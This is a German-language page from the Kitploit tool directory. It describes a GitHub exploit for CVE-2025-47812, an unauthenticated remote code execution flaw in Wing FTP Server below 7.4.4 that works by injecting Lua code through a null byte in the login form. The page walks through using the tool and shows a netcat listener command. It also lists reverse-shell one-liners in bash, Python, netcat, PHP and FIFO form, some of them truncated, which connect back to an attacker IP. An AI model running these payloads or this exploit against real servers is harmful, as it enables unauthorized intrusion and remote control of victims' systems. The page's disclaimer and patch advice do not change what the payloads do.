Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-47812 — Nicht authentifizierter Remotecodeausführungs-Exploit für Wing FTP Server < 7.4.4. Injiziert Lua-Code über ein Null-Byte im Anmeldeformular, um Befehle auszuführen oder Reverse Shells zu starten. Enthält mehrere Payload-Typen. | Kitploit
Tools/GitHubGitHub/blindma1den/cve-2025-47812
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingRemote-Access-Tool
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

Nicht authentifizierter Remotecodeausführungs-Exploit für Wing FTP Server < 7.4.4. Injiziert Lua-Code über ein Null-Byte im Anmeldeformular, um Befehle auszuführen oder Reverse Shells zu starten. Enthält mehrere Payload-Typen.

1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2025-47812 - Wing FTP Server Remotecodeausführung (RCE)

===========================================================

Autor: blindma1den

Datum: Juli 2025

Exploit-Typ: Remotecodeausführung (Unauthenticated)

Ziel: Wing FTP Server < 7.4.4

CVSS-Score: 10.0 (Kritisch)


BESCHREIBUNG

Dieses Skript nutzt CVE-2025-47812 aus, eine kritische Schwachstelle im Webinterface von Wing FTP Server, die es entfernten Angreifern ermöglicht, beliebige Systembefehle auszuführen oder eine Reverse Shell ohne Authentifizierung zu öffnen.

Der Fehler wird durch unsachgemäße Handhabung von Nullbytes (%00) im Anmeldeformular (/loginok.html) verursacht. Dies ermöglicht die Injektion von Lua-Code in Sitzungsdateien, die später ausgewertet werden, wenn Endpunkte wie /dir.html aufgerufen werden.


QUELLEN

NVD-Beschreibung: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


FUNKTIONEN

  • Befehlsausführung (z. B. whoami, uname -a)
  • Mehrere Reverse-Shell-Payloads
  • Extrahiert das UID-Sitzungs-Cookie automatisch
  • Saubere modulare Python-3-Implementierung

ANFORDERUNGEN

  • Python 3.7+
  • requests-Modul

Abhängigkeiten installieren:

root@kitploit:~
pip install requests

VERWENDUNG

Skript ausführen:

root@kitploit:~
python3 wingftp_rce_exploit.py

Sie werden nach Folgendem gefragt:

  • Ziel-URL (z. B. http://127.0.0.1:5466)
  • Benutzername (Standard: anonymous)
  • Exploit-Modus: [1] Befehl ausführen [2] Reverse Shell starten

BEISPIELE

[1] BEFEHL AUSFÜHREN:

root@kitploit:~
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami

[2] REVERSE SHELL:

root@kitploit:~
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444

Starten Sie Ihren Listener, bevor Sie die Shell auslösen:

root@kitploit:~
nc -lvnp 4444

VERWENDETE PAYLOADS (REVERSE SHELL)

Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

Python3: python3 -c 'import socket,subprocess,os; ...'

Netcat: nc IP PORT -e /bin/sh

PHP: php -r '$sock=fsockopen("IP",PORT); ...'

FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


HAFTUNGSAUSSCHLUSS

Dieser Code dient nur zu Bildungszwecken. Verwenden Sie diesen Exploit NICHT gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Genehmigung zum Testen haben. Unberechtigte Nutzung ist illegal und unethisch.

Patchen Sie Ihre Systeme sofort. Wing FTP Server 7.4.4 behebt diese Schwachstelle.

Happy hacking!

Tool herunterladen